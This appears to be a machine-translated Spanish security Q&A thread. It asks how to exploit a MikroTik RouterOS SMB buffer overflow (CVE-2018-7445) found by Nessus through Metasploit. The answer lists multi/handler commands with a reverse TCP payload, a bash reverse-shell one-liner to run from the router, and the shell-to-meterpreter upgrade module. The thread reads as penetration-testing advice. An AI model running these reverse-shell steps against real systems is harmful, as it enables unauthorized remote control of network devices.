Nessus encontró una vulnerabilidad, pero no se encontró una vulnerabilidad en Metasploit: cómo ejecutar con meterpreter

2

Ejecuté Nessus en una red local, encontré una vulnerabilidad crítica para el enrutador:

MikroTik RouterOS < 6.41.3 SMB Buffer Overflow

(Descripción de la vulnerabilidad: Exploit-db )

Pero no puedo encontrar ningún exploit correspondiente en metasploit para esta vulnerabilidad. En msfconsole hizo search CVE-2018-7445 pero no obtuvo ningún resultado.

¿Hay alguna manera para que pueda usar el exploit en metasploit, con el meterpreter?

    
pregunta Johnny Pralo 05.11.2018 - 16:03
fuente

1 respuesta

1

Básicamente, necesitas usar el exploit en el enlace exploit-db para obtener un shell, luego iniciar un controlador Metasploit:

use exploit/multi/handler
set LHOST [local ip address]
set LPORT 4444
set payload linux/x86/shell/reverse_tcp
run

Una vez que se está ejecutando el manejador de carga, puede hacer una conexión TCP inversa desde el enrutador para obtener una sesión en Metasploit:

bash -i >& /dev/tcp/[local ip address]/4444 0>&1

Luego, realice un segundo plano de la sesión y use el módulo post/multi/manage/shell_to_meterpreter para actualizar el shell a un shell de Meterpreter.

    
respondido por el Joe 05.11.2018 - 17:17
fuente

Lea otras preguntas en las etiquetas